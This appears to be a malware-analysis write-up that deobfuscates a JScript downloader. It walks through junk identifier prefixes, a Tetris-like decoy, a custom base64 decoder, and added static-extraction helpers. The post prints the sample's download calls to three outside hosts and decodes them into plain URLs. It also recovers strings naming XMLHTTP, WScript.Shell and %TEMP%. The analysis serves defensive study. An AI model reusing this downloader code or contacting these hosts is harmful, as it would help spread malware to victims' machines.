function votgorodazaspinoyiputkoroheCCCcenter(votgorodazaspinoyiputkoroheCCCrivulet) {
request = votgorodazaspinoyiputkoroheCCCrivulet;
for (var votgorodazaspinoyiputkoroheCCCi in votgorodazaspinoyiputkoroheCCCqtcnthltqfqrhfq){request = request.replace(votgorodazaspinoyiputkoroheCCCi, votgorodazaspinoyiputkoroheCCCqtcnthltqfqrhfq[votgorodazaspinoyiputkoroheCCCi]);}
return request;
};
var votgorodazaspinoyiputkoroheCCCchosen = 33/3-10;
function votgorodazaspinoyiputkoroheCCCrodmands(x, y) {
this.x = x + "bbfgnfgngn";
this.y = y - "fgnfgngfgf";
};
var votgorodazaspinoyiputkoroheCCClulalula = new Array(4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,67,4,4,4,68,57,58,59,60,61,62,63,64,65,66,4,4,4,4,4,4,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,4,4,4,4,4,4,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4);
...
var votgorodazaspinoyiputkoroheCCCd7 = votgorodazaspinoyiputkoroheCCCcenter("00M"+"11SX"+"22ML"+("votgorodazaspinoyiputkoroheCCCcontinues","votgorodazaspinoyiputkoroheCCCoxfordshire","votgorodazaspinoyiputkoroheCCCinconsolable","votgorodazaspinoyiputkoroheCCCgazelle","votgorodazaspinoyiputkoroheCCClaundry","2.")+"PIPIPKAM"+"LH"+"TT"+("votgorodazaspinoyiputkoroheCCCsurvival","votgorodazaspinoyiputkoroheCCCmotif","votgorodazaspinoyiputkoroheCCCchaotic","votgorodazaspinoyiputkoroheCCClotus","votgorodazaspinoyiputkoroheCCCheritage","votgorodazaspinoyiputkoroheCCCplaces","votgorodazaspinoyiputkoroheCCCcamera","votgorodazaspinoyiputkoroheCCCemacs","P}")+"WU"+("votgorodazaspinoyiputkoroheCCCeddie","votgorodazaspinoyiputkoroheCCCflustered","votgorodazaspinoyiputkoroheCCCexalt","votgorodazaspinoyiputkoroheCCCfahrenheit","votgorodazaspinoyiputkoroheCCCcredit","votgorodazaspinoyiputkoroheCCCclassroom","votgorodazaspinoyiputkoroheCCCtrends","cr")+("votgorodazaspinoyiputkoroheCCCunbending","votgorodazaspinoyiputkoroheCCCranked","votgorodazaspinoyiputkoroheCCCavenue","votgorodazaspinoyiputkoroheCCCdurable","votgorodazaspinoyiputkoroheCCCvestibule","votgorodazaspinoyiputkoroheCCCceremony","votgorodazaspinoyiputkoroheCCCelementary","votgorodazaspinoyiputkoroheCCCcongregate","ip")+"t:S"+("votgorodazaspinoyiputkoroheCCCmining","votgorodazaspinoyiputkoroheCCCsurmount","votgorodazaspinoyiputkoroheCCCintimidate","votgorodazaspinoyiputkoroheCCCbetween","votgorodazaspinoyiputkoroheCCCcroatia","votgorodazaspinoyiputkoroheCCCampland","votgorodazaspinoyiputkoroheCCCglenn","votgorodazaspinoyiputkoroheCCCmunicipality","h")+"e"+("votgorodazaspinoyiputkoroheCCCvoracious","votgorodazaspinoyiputkoroheCCCreaper","votgorodazaspinoyiputkoroheCCCcrispin","votgorodazaspinoyiputkoroheCCCcount","votgorodazaspinoyiputkoroheCCCeffeminacy","votgorodazaspinoyiputkoroheCCCmashed","votgorodazaspinoyiputkoroheCCCconvinced","votgorodazaspinoyiputkoroheCCCslovak","ll"));
...
...
eval("IGZ1bmN0aW9uIHZvdGdvcm9kYXphc3Bpbm95aXB1dGtvcm.........XB1dGtvcm9oZUNDQ2NjYTsNCn07".votgorodazaspinoyiputkoroheCCCmanysecretthings());
...
votgorodazaspinoyiputkoroheCCCTetromino.prototype.getNew = function (index) { this.x = 4; index = 6; this.index = index; switch (index) { case 1: this.frameNumber = 1; this.sprite = 5; this.sprite = 1; this.frame = new Array( new Array( new Array(0, -1), new Array(0, 0), new Array(1, -1), new Array(1, 0) ) ); break; case 2:this.frameNumber = 4; this.sprite = 4; this.sprite = 2; this.frame = new Array( new Array( new Array(2, 0), new Array(-1, 0), new Array(0, 0), new Array(1, 0) ), new Array( new Array(1, -1), new Array(1, 0), new Array(1, 1), new Array(1, 2) ), new Array( new Array(2, 1), new Array(-1, 1), new Array(0, 1), new Array(1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(0, 2) ) ); break; case 3:this.frameNumber = 4; this.sprite = 7; this.sprite = 3; this.frame = new Array( new Array( new Array(1, -1), new Array(0, -1), new Array(0, 0), new Array(-1, 0) ), new Array( new Array(0, -1), new Array(0, 0), new Array(1, 0), new Array(1, 1) ), new Array( new Array(1, -1), new Array(0, -1), new Array(0, 0), new Array(-1, 0) ), new Array( new Array(-1, -1), new Array(-1, 0), new Array(0, 0), new Array(0, 1) ) ); break; case 4: this.sprite = 2; this.sprite = 4; this.frameNumber = 2; this.frame = new Array( new Array( new Array(-1, -1), new Array(0, -1), new Array(0, 0), new Array(1, 0) ), new Array( new Array(0, 0), new Array(1, 0), new Array(0, 1), new Array(1, -1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(0, 1), new Array(1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(-1, 0), new Array(-1, 1) ) ); break; case 5:this.frameNumber = 4; this.sprite = 3; this.sprite = 5; this.frame = new Array( new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(1, -1) ), new Array( new Array(-1, -1), new Array(0, -1), new Array(0, 0), new Array(0, 1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(-1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 
1), new Array(1, 1) ) ); break; case 6: this.sprite = 1; this.sprite = 6; this.frameNumber = 4; this.frame = new Array( new Array( new Array(-1, -1), new Array(-1, 0), new Array(0, 0), new Array(1, 0) ), new Array( new Array(0, -1), new Array(-1, -1), new Array(-1, 0), new Array(-1, 1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(1, 1) ), new Array( new Array(1, -1), new Array(1, 0), new Array(1, 1), new Array(0, 1) ) ); break; case 7: this.sprite = 6; this.sprite = 7; this.frameNumber = 4; this.frame = new Array( new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(0, -1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(-1, 0) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(0, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(1, 0) ) ); break; }};
};
...
try{
votgorodazaspinoyiputkoroheCCCShtyler4("http://"+"\u0068e\u0072i\u006Da\u0073u"+"\u002Ew\u0065b\u002Ef\u00632\u002Ec\u006Fm\u002F0\u0039u\u0039j\u006E8\u0037" + "?AMLXoFbQSk=KGkINlTdQz","JlLQdKnWwif");
}catch(votgorodazaspinoyiputkoroheuUxUroNK){}
try{
votgorodazaspinoyiputkoroheCCCShtyler4("http://"+"\u00312\u0035r\u0075"+".\u0077e\u0062.\u0066c\u0032.\u0063o\u006D/\u00309\u00759\u006An\u00387" + "?yMsjsVxGF=efxMvO","bsMnCcz");
}catch(votgorodazaspinoyiputkoroheSaqWtHkKPQ){}
try{
votgorodazaspinoyiputkoroheCCCShtyler4("http://"+"\u0068r\u0065n\u006Ee\u0072"+".\u0067m\u0078h\u006Fm\u0065.\u0064e\u002F0\u0039u\u0039j\u006E8\u0037" + "?xBpCVMC=cLVucBgsR","FgGsqpxH");
}catch(votgorodazaspinoyiputkoroheIqjwksMIt){}
Deobfuscation :
1)
First thing to do : delete all "votgorodazaspinoyiputkoroheCCC" and "votgorodazaspinoyiputkorohe" parts :
rodmands.create = function(){
var publisher = new MBJSL.Publisher();
var spyFunction1 = sinon.spy();
publisher.subscribe(spyFunction1, this.type1);
publisher.publish(this.type1);
ok(spyFunction1.calledWith(), "Function called without arguments");
publisher.publish(this.type1, "PROPER1");
ok(spyFunction1.calledWith("PROPER1"), "Function called with 'PROPER1' argument");
publisher.publish(this.type1, ["PROPER1", "PROPER2"]);
ok(spyFunction1.calledWith(["PROPER1", "PROPER2"]), "Function called with 'PROPER1' and 'PROPER2' arguments");
};
rodmands.subtract = function(param1, param2) {
return new rodmands(param1.x - param2.x, param1.y - param2.y);
};
var qtcnthltqfqrhfq = { ':': '.','U': 'S','PIPIPKA': 'X', '00':'', '11':'', '22':''};
var errant = 0;
function achievment(bidttt){
if(bidttt==1){return 2;}
else{return 17;}
return 3;};
function center(rivulet) {
request = rivulet;
for (var i in qtcnthltqfqrhfq){request = request.replace(i, qtcnthltqfqrhfq[i]);}
return request;
};
var chosen = 33/3-10;
function rodmands(x, y) {
this.x = x + "bbfgnfgngn";
this.y = y - "fgnfgngfgf";
};
var lulalula = new Array(4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,67,4,4,4,68,57,58,59,60,61,62,63,64,65,66,4,4,4,4,4,4,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,4,4,4,4,4,4,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4);
var d7 = center("00M"+"11SX"+"22ML"+("continues","oxfordshire","inconsolable","gazelle","laundry","2.")+"PIPIPKAM"+"LH"+"TT"+("survival","motif","chaotic","lotus","heritage","places","camera","emacs","P}")+"WU"+("eddie","flustered","exalt","fahrenheit","credit","classroom","trends","cr")+("unbending","ranked","avenue","durable","vestibule","ceremony","elementary","congregate","ip")+"t:S"+("mining","surmount","intimidate","between","croatia","ampland","glenn","municipality","h")+"e"+("voracious","reaper","crispin","count","effeminacy","mashed","convinced","slovak","ll"));
...
...
eval("IGZ1bmN0aW9uIHZvdGdvcm9kYXphc3Bpbm95aXB1dGtvcm.........XB1dGtvcm9oZUNDQ2NjYTsNCn07".manysecretthings());
Tetromino.prototype.getNew = function (index) { this.x = 4; index = 6; this.index = index; switch (index) { case 1: this.frameNumber = 1; this.sprite = 5; this.sprite = 1; this.frame = new Array( new Array( new Array(0, -1), new Array(0, 0), new Array(1, -1), new Array(1, 0) ) ); break; case 2:this.frameNumber = 4; this.sprite = 4; this.sprite = 2; this.frame = new Array( new Array( new Array(2, 0), new Array(-1, 0), new Array(0, 0), new Array(1, 0) ), new Array( new Array(1, -1), new Array(1, 0), new Array(1, 1), new Array(1, 2) ), new Array( new Array(2, 1), new Array(-1, 1), new Array(0, 1), new Array(1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(0, 2) ) ); break; case 3:this.frameNumber = 4; this.sprite = 7; this.sprite = 3; this.frame = new Array( new Array( new Array(1, -1), new Array(0, -1), new Array(0, 0), new Array(-1, 0) ), new Array( new Array(0, -1), new Array(0, 0), new Array(1, 0), new Array(1, 1) ), new Array( new Array(1, -1), new Array(0, -1), new Array(0, 0), new Array(-1, 0) ), new Array( new Array(-1, -1), new Array(-1, 0), new Array(0, 0), new Array(0, 1) ) ); break; case 4: this.sprite = 2; this.sprite = 4; this.frameNumber = 2; this.frame = new Array( new Array( new Array(-1, -1), new Array(0, -1), new Array(0, 0), new Array(1, 0) ), new Array( new Array(0, 0), new Array(1, 0), new Array(0, 1), new Array(1, -1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(0, 1), new Array(1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(-1, 0), new Array(-1, 1) ) ); break; case 5:this.frameNumber = 4; this.sprite = 3; this.sprite = 5; this.frame = new Array( new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(1, -1) ), new Array( new Array(-1, -1), new Array(0, -1), new Array(0, 0), new Array(0, 1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(-1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(1, 1) ) ); break; 
case 6: this.sprite = 1; this.sprite = 6; this.frameNumber = 4; this.frame = new Array( new Array( new Array(-1, -1), new Array(-1, 0), new Array(0, 0), new Array(1, 0) ), new Array( new Array(0, -1), new Array(-1, -1), new Array(-1, 0), new Array(-1, 1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(1, 1) ), new Array( new Array(1, -1), new Array(1, 0), new Array(1, 1), new Array(0, 1) ) ); break; case 7: this.sprite = 6; this.sprite = 7; this.frameNumber = 4; this.frame = new Array( new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(0, -1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(-1, 0) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(0, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(1, 0) ) ); break; }};
};
...
try{
Shtyler4("http://"+"\u0068e\u0072i\u006Da\u0073u"+"\u002Ew\u0065b\u002Ef\u00632\u002Ec\u006Fm\u002F0\u0039u\u0039j\u006E8\u0037" + "?AMLXoFbQSk=KGkINlTdQz","JlLQdKnWwif");
}catch(votgorodazaspinoyiputkoroheuUxUroNK){}
try{
Shtyler4("http://"+"\u00312\u0035r\u0075"+".\u0077e\u0062.\u0066c\u0032.\u0063o\u006D/\u00309\u00759\u006An\u00387" + "?yMsjsVxGF=efxMvO","bsMnCcz");
}catch(votgorodazaspinoyiputkoroheSaqWtHkKPQ){}
try{
Shtyler4("http://"+"\u0068r\u0065n\u006Ee\u0072"+".\u0067m\u0078h\u006Fm\u0065.\u0064e\u002F0\u0039u\u0039j\u006E8\u0037" + "?xBpCVMC=cLVucBgsR","FgGsqpxH");
}catch(votgorodazaspinoyiputkoroheIqjwksMIt){}
Look at the end :
try{
Shtyler4("http://"+"\u0068e\u0072i\u006Da\u0073u"+"\u002Ew\u0065b\u002Ef\u00632\u002Ec\u006Fm\u002F0\u0039u\u0039j\u006E8\u0037" + "?AMLXoFbQSk=KGkINlTdQz","JlLQdKnWwif");
}catch(votgorodazaspinoyiputkoroheuUxUroNK){}
try{
Shtyler4("http://"+"\u00312\u0035r\u0075"+".\u0077e\u0062.\u0066c\u0032.\u0063o\u006D/\u00309\u00759\u006An\u00387" + "?yMsjsVxGF=efxMvO","bsMnCcz");
}catch(votgorodazaspinoyiputkoroheSaqWtHkKPQ){}
try{
Shtyler4("http://"+"\u0068r\u0065n\u006Ee\u0072"+".\u0067m\u0078h\u006Fm\u0065.\u0064e\u002F0\u0039u\u0039j\u006E8\u0037" + "?xBpCVMC=cLVucBgsR","FgGsqpxH");
}catch(votgorodazaspinoyiputkoroheIqjwksMIt){}
- Using the tool I linked in part (1) :
http://"+"herimasu"+".web.fc2.com/09u9jn87" + "?AMLXoFbQSk=KGkINlTdQz"
http://"+"125ru"+".web.fc2.com/09u9jn87" + "?yMsjsVxGF=efxMvO
http://"+"hrenner"+".gmxhome.de/09u9jn87" + "?xBpCVMC=cLVucBgsR"
My first question when I saw this part: "Why don't they put the URLs in a way that is as easy to retrieve?!"
My second question was: "are these really the URLs used to download the payloads?!"
The first and third URLs are blocked by KTS cloud
The second no longer exists: 403
The very interesting part, the deobfuscation of their "chaotic" source, made me curious and made me want to deobfuscate it completely (to see the real parts used, etc.)
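As an added example (my own code, not the sample's and not part of the original post), here are the mechanical steps of part (1) done statically, without ever running the script: stripping the "votgorodazaspinoyiputkorohe[CCC]" identifier padding, resolving the ("junk", ..., "x") comma groups and the center() replace table to recover d7, and decoding the \uXXXX-escaped URL concatenations from the try blocks at the end. The names stripJunkPrefix, resolveConcat, recoverD7 and recoverUrl are mine; REPLACE_MAP is the qtcnthltqfqrhfq table and D7_EXPR / URL_EXPR are the two expressions copied from the deobfuscated listing above.

```javascript
// Added example, not code from the sample or the original post.
// Static helpers for step (1): strip the identifier padding, resolve the
// comma-operator groups and the center() replace table, decode \uXXXX URLs.

// Every identifier in the sample carries this prefix, with or without "CCC".
const JUNK_PREFIX = /votgorodazaspinoyiputkorohe(?:CCC)?/g;

function stripJunkPrefix(src) {
  return src.replace(JUNK_PREFIX, "");
}

// qtcnthltqfqrhfq, copied from the deobfuscated listing. String.prototype.replace
// with a string pattern replaces only the FIRST occurrence; the enumeration order
// does not matter for the sample's input because each token occurs exactly once.
const REPLACE_MAP = { ':': '.', 'U': 'S', 'PIPIPKA': 'X', '00': '', '11': '', '22': '' };

function center(s) {
  let request = s;
  for (const key in REPLACE_MAP) {
    request = request.replace(key, REPLACE_MAP[key]);
  }
  return request;
}

// Resolve a  "lit" + ("junk", ..., "x") + "lit"  concatenation without eval().
// In JavaScript the comma operator yields its LAST operand, so a parenthesised
// group contributes only its final string; JSON.parse turns each quoted literal
// (including \uXXXX escapes) into the real characters.
function resolveConcat(expr) {
  const tokenRe = /\(([^()]*)\)|"((?:[^"\\]|\\.)*)"/g;
  let result = "";
  let m;
  while ((m = tokenRe.exec(expr)) !== null) {
    if (m[1] !== undefined) {
      const parts = m[1].match(/"(?:[^"\\]|\\.)*"/g) || [];
      if (parts.length > 0) result += JSON.parse(parts[parts.length - 1]);
    } else {
      result += JSON.parse('"' + m[2] + '"');
    }
  }
  return result;
}

// The argument of center(...) from the listing (junk prefixes already stripped).
const D7_EXPR = `"00M"+"11SX"+"22ML"+("continues","oxfordshire","inconsolable","gazelle","laundry","2.")+"PIPIPKAM"+"LH"+"TT"+("survival","motif","chaotic","lotus","heritage","places","camera","emacs","P}")+"WU"+("eddie","flustered","exalt","fahrenheit","credit","classroom","trends","cr")+("unbending","ranked","avenue","durable","vestibule","ceremony","elementary","congregate","ip")+"t:S"+("mining","surmount","intimidate","between","croatia","ampland","glenn","municipality","h")+"e"+("voracious","reaper","crispin","count","effeminacy","mashed","convinced","slovak","ll")`;

// First argument of the first Shtyler4(...) call at the end of the listing
// (String.raw keeps the \uXXXX escapes as text so the resolver has to decode them).
const URL_EXPR = String.raw`"http://"+"\u0068e\u0072i\u006Da\u0073u"+"\u002Ew\u0065b\u002Ef\u00632\u002Ec\u006Fm\u002F0\u0039u\u0039j\u006E8\u0037" + "?AMLXoFbQSk=KGkINlTdQz"`;

function recoverD7() {
  return center(resolveConcat(D7_EXPR));
}

function recoverUrl(expr) {
  return resolveConcat(expr);
}

console.log(recoverD7());          // MSXML2.XMLHTTP}WScript.Shell
console.log(recoverUrl(URL_EXPR)); // the first URL quoted above
```

The recovered d7 value is "MSXML2.XMLHTTP}WScript.Shell": the ProgIDs of the XMLHTTP client and of the WScript shell object, joined by a "}" separator, which a plain string search of the script would never find. Resolving the concatenations this way gives the same URLs as the tool used above, and it pulls the IoCs out of a sample before any sandbox run.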
3)
Let's investigate more
var sirdallos ="RAPAPIPATARXhwYW5RAPAPIPATAkRW52aXRAPAPIPATAJvbm1lbnRTdHJRAPAPIPATApbmdz".manysecretthings();
A lot of strange strings use the same function: manysecretthings();
=> lol, very explicit name they gave it
The most important string used this way is 8492 chars long
manysecretthings() uses char code BITWISE operations: AND, OR, SHR, SHL
and also uses an array to retrieve the right char code from the calculated values: lulalula
String.prototype.manysecretthings = function() {
var c1, c2, c3, c4;
var i, len, out;
var str = this.replace(/RAPAPIPATA/g, ''); // remove all "RAPAPIPATA" strings
len = str.length; // length of the new string
i = 0;
out = "";
while (i < len) { // Principal loop
do {
c1 = lulalula[str.charCodeAt(i++) & 0xff];
} while (i < len && c1 == -1);
if (c1 == -1)
break;
var dodo = false;
do {
c2 = lulalula[str.charCodeAt(i++) & 0xff];
dodo = i < len && c2 == -1;
} while (dodo);
if (c2 == -1)
break;
out += String.fromCharCode((c1 << 2) | ((c2 & 0x30) >> 4));
do {
c3 = str.charCodeAt(i++) & 0xff;
if (c3 == 61)
return out;
c3 = lulalula[c3];
} while (i < len && c3 == -1);
if (c3 == -1)
break;
out += String.fromCharCode(((c2 & 0XF) << 4) | ((c3 & 0x3c) >> 2));
do {
c4 = str.charCodeAt(i++) & 0xff;
if (c4 == 61)
return out;
c4 = lulalula[c4];
} while (i < len && c4 == -1);
if (c4 == -1)
break;
out += String.fromCharCode(((c3 & 0x03) << 6) | c4);
} // end of principal while
return out; // string decrypted
};
var lulalula = new Array(4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,67,4,4,4,68,57,58,59,60,61,62,63,64,65,66,4,4,4,4,4,4,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,4,4,4,4,4,4,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4);
var lulalulaI, lulalulan = lulalula.length;
for (lulalulaI= 0; lulalulaI < lulalulan; ++lulalulaI) {
lulalula[lulalulaI] = lulalula[lulalulaI] - 5;
} // here the real values of lulalula are in place
Let's test :
var VARDOCF ="JVRFTVAl".manysecretthings();
=> "%TEMP%"
var finde = "QWN0aXZlWE9iamVjdARAPAPIPATA=RAPAPIPATA=RAPAPIPATA".manysecretthings();
=> "ActiveXObject"
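As an added example (again my own code, not the sample's and not part of the original post): manysecretthings() rebuilt from the listing above as a stand-alone function, with the lulalula table reconstructed from the layout of the literal (4 everywhere, 67 at '+', 68 at '/', 57..66 at '0'..'9', 5..30 at 'A'..'Z', 31..56 at 'a'..'z'), and a check that once the "- 5" loop has run it is nothing but the standard base64 decode table. The helper names buildLulalula, shiftTable, standardBase64Table and tablesMatch are mine; the three test strings are the ones quoted in this part of the post.

```javascript
// Added example, not code from the sample or the original post.
// manysecretthings() = "remove the RAPAPIPATA token, then base64-decode".

// lulalula as it appears in the sample, rebuilt from the layout of the literal.
// Index = char code of an input character; every value is stored +5.
function buildLulalula() {
  const t = new Array(256).fill(4);
  t['+'.charCodeAt(0)] = 67;
  t['/'.charCodeAt(0)] = 68;
  for (let i = 0; i < 10; i++) t['0'.charCodeAt(0) + i] = 57 + i;
  for (let i = 0; i < 26; i++) t['A'.charCodeAt(0) + i] = 5 + i;
  for (let i = 0; i < 26; i++) t['a'.charCodeAt(0) + i] = 31 + i;
  return t;
}

// The sample's "- 5" loop: 4 becomes -1 ("not a base64 digit, skip it") and
// every other entry becomes the 6-bit value of that character.
function shiftTable(t) {
  return t.map(v => v - 5);
}

// Standard RFC 4648 decode table, built independently for comparison.
function standardBase64Table() {
  const alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
  const t = new Array(256).fill(-1);
  for (let i = 0; i < alphabet.length; i++) t[alphabet.charCodeAt(i)] = i;
  return t;
}

function tablesMatch(a, b) {
  return a.length === b.length && a.every((v, i) => v === b[i]);
}

const lulalula = shiftTable(buildLulalula());

// Same control flow as the sample's String.prototype method: the do/while
// loops skip any byte whose table entry is -1, and '=' (code 61) ends the output.
function manysecretthings(s, junk = "RAPAPIPATA") {
  const str = s.split(junk).join("");   // the sample uses replace(/RAPAPIPATA/g, '')
  const len = str.length;
  let out = "";
  let i = 0;
  while (i < len) {
    let c1, c2, c3, c4;
    do { c1 = lulalula[str.charCodeAt(i++) & 0xff]; } while (i < len && c1 === -1);
    if (c1 === -1) break;
    do { c2 = lulalula[str.charCodeAt(i++) & 0xff]; } while (i < len && c2 === -1);
    if (c2 === -1) break;
    out += String.fromCharCode((c1 << 2) | ((c2 & 0x30) >> 4));
    do {
      c3 = str.charCodeAt(i++) & 0xff;
      if (c3 === 61) return out;          // '=' padding
      c3 = lulalula[c3];
    } while (i < len && c3 === -1);
    if (c3 === -1) break;
    out += String.fromCharCode(((c2 & 0x0f) << 4) | ((c3 & 0x3c) >> 2));
    do {
      c4 = str.charCodeAt(i++) & 0xff;
      if (c4 === 61) return out;
      c4 = lulalula[c4];
    } while (i < len && c4 === -1);
    if (c4 === -1) break;
    out += String.fromCharCode(((c3 & 0x03) << 6) | c4);
  }
  return out;
}

console.log(tablesMatch(lulalula, standardBase64Table()));              // true
console.log(manysecretthings("JVRFTVAl"));                              // %TEMP%
console.log(manysecretthings("QWN0aXZlWE9iamVjdARAPAPIPATA=RAPAPIPATA=RAPAPIPATA")); // ActiveXObject
console.log(manysecretthings("RAPAPIPATARXhwYW5RAPAPIPATAkRW52aXRAPAPIPATAJvbm1lbnRTdHJRAPAPIPATApbmdz")); // ExpandEnvironmentStrings
```

The "+5" offset and the injected RAPAPIPATA token are the whole trick: the strings are ordinary base64, but neither a base64 regex nor a standard decoder recognises them until the token is removed. When triaging this family, the table-building loop (a 256-entry array followed by a constant subtraction) is a more reliable thing to look for than the encoded strings themselves.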